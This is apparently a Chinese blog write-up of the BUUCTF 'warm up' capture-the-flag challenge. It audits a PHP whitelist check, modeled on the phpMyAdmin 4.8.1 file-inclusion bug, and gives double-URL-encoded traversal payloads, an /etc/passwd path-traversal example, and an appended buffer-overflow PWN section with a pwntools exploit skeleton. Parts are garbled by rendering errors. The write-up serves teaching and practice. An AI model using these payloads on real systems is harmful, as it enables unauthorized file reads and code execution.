buuctf -- warm up(远程文件包含漏洞)

一.source.php

点开页面,是一个滑稽的表情。当然老规矩,右键审查页面源代码
在这里插入图片描述在这里插入图片描述发现了哥source.php,于是访问一下。

source.php

 <?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}  
?>

二.hint.php

扫了一眼上面的代码,发现个hint.php

在这里插入图片描述
flag not here,and flag in ffffllllaaaagggg,猜测flag应该是在ffffllllaaaagggg 中

三.代码审计

这是个phpmyadmin 4.8.1 远程文件包含漏洞
主体部分:
if (! empty(KaTeX parse error: Expected 'EOF', got '#' at position 20: …UEST['file']) #̲#不能为空 &…_REQUEST[‘file’]) ##是字符串
&& emmm::checkFile($_REQUEST[‘file’]) ##上面checkfile返回为true
) {
include $_REQUEST[‘file’];
exit;
} else {
echo “
<img src=“https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg” />”;
}

  • 1.判断传入的file不能为空
  • 2.并且是字符串
  • 3.checkFile()返回true

满足以上三点才可包含文件

分析 checkfile()函数(重点,核心)
首先是设置了个白名单
第一个if,判断page变量是否为空,是否是字符串
第二个if,判断传入的page是否在白名单中
第三个if,截取page ?之前的字符赋给_page,判断_page是否在白名单中
第四个if,对page进行一次url解码并赋给_page,截取_page ?之前的字符赋给_page,判断_page是否在白名单中,因此需传入二次编码后的内容,就可以使checkfile返回true。
两种payload的情况:

  • 不满足第一个if,满足第三个if
  • 不满足第一个if,满足第三个if
    传入?file=hint.php%253f…/…/…/…/…/…/…/…/ffffllllaaaagggg,因为服务器会自动解一次码,所以 p a g e 的 值 为 h i n t . p h p page的值为hint.php%3f../../../../../../../../ffffllllaaaagggg,又一次url解码后, pagehint.php_page的值为hint.php?../…/…/…/…/…/…/…/ffffllllaaaagggg,然后截取问号前面的hint.php判断在白名单里返回true。

满足第二个if即为?file=source.php,? file=hint.php,即访问source.php,hint.php的情况

四.构造payload

payload:
file=hint.php?/../../../../../../../../ffffllllaaaagggg(第一种payload情况) file=hint.php%253f/../../../../../../../../ffffllllaaaagggg

这两个payload都可以,只是返回true的地方不一样

例:
在这里插入图片描述拿下!!!
在这里插入图片描述

补充(目录穿越)

漏洞原理:

在Unix操作系统上,../ 是一个标准的返回上一级路径的语法;

在Windows操作系统上, ../ 和 ..\ 都是返回上一级的语句。

若web要显示一个商品的图像,有时候开发者会用通过HTML加载,如:

在这里插入图片描述

使用filename参数加载图像文件,图片文件位置可能映射在 /var/www/images/ 上,所以真实的路径是 /var/www/images/214.png

这就导致了攻击者可以读取服务器上的任意文件:

https://www.*****.com/loadImage?filename=…/…/…/etc/passwd

filename的参数值与真实路径组合起来就是:

/var/www/images/…/…/…/etc/passwd

其等价于:

/etc/passwd
详细请见:
大佬的blog

### 关于BUUCTF PWN题目的解法与教程 #### 环境搭建 为了顺利解决BUUCTF中的PWN题目,需先构建适合的实验环境。具体方法可参照相关资料[^1]。 #### 题目分析与解法实例 ##### 基础概念理解 针对`rip1`这类基础题目,尽管看似简单,但对于初学者而言仍具一定难度。此题涉及到了基本的溢出漏洞利用技术以及如何通过控制返回地址来实现特定功能调用的理解[^2]。 ##### 实际操作流程 考虑如下C代码片段展示了一个存在缓冲区溢出风险的服务端程序逻辑: ```c __int64 __fastcall main(int a1, char **a2, char **a3) { char s[64]; char v5[64]; write(1, "-Warm Up-\n", 0xAuLL); write(1, "WOW:", 4uLL); sprintf(s, "%p\n", sub_40060D); write(1, s, 9uLL); write(1, ">", 1uLL); return gets(v5); // 存在一个危险函数gets导致潜在的安全隐患 } int sub_40060D() { return system("cat flag.txt"); } ``` 上述代码中,由于使用了不安全的输入读取方式(`gets`),使得攻击者能够向变量`v5`写入超过其定义长度的数据,从而覆盖掉堆栈上的其他重要信息,包括函数返回后的指令指针(RIP)[^3]。 ##### 利用技巧说明 当面对此类基于ROP(Return-Oriented Programming)机制的问题时,核心在于找到合适的gadget组合以完成预期的操作序列。例如,在本案例里,可以通过精心构造payload去定位到`pop rdi; ret`这样的 gadget 来设置参数传递给后续要执行的关键API `system()` 函数之前所必需的目标字符串地址(即指向 `/bin/sh\x00` 或 `"cat flag"` 的内存位置),进而达到获取shell或读取文件的目的[^4]。 #### Python脚本编写指南 下面给出一段用于自动化发送恶意载荷并与目标服务交互的小型Python客户端示例代码: ```python from pwn import * # 连接到远程服务器 conn = remote('target_ip', target_port) # 构造 payload 并发送至远端进程 exploit_payload = b'A' * offset_to_RIP + pack(address_of_pop_rdi_ret_gadget) + ... # 完整有效负载取决于具体情况 conn.sendline(exploit_payload) # 接收响应数据并打印出来 print(conn.recvall().decode()) ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值